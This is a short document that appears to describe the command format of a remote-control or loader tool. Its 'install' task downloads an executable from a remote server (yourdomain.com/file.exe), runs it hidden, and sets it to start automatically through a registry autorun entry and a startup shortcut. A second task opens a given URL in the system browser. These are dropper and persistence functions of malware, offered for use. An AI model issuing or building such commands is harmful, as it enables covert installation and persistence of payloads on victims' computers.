This task download all type file from remote server, save to input directory, execute file, add this to startup from regedit and create autoload shortcut.
install;http://yourdomain.com/file.exe;file.exe;run;hide;add_to_regedit;create_autoload_shortcut;
| Param | Description |
|---|---|
install
|
Task type |
http://yourdomain.com/file.exe
|
Full path to file in web |
file.exe
|
File name to save in PC |
run / drop
|
run - run after download, drop - none |
hide / show
|
hide - run app hide, show - rin app show |
add_to_regedit / drop
|
add_to_regedit - add to autoload current user, drop - none |
create_autoload_shortcut / drop
|
create_autoload_shortcut - create autoload shortcut for current user, drop - none |
This task opening your URL in default system browser.
open_url;https://google.com
| Param | Description |
|---|---|
open_url
|
Task type |
https://google.com
|
Your URL to open in browser |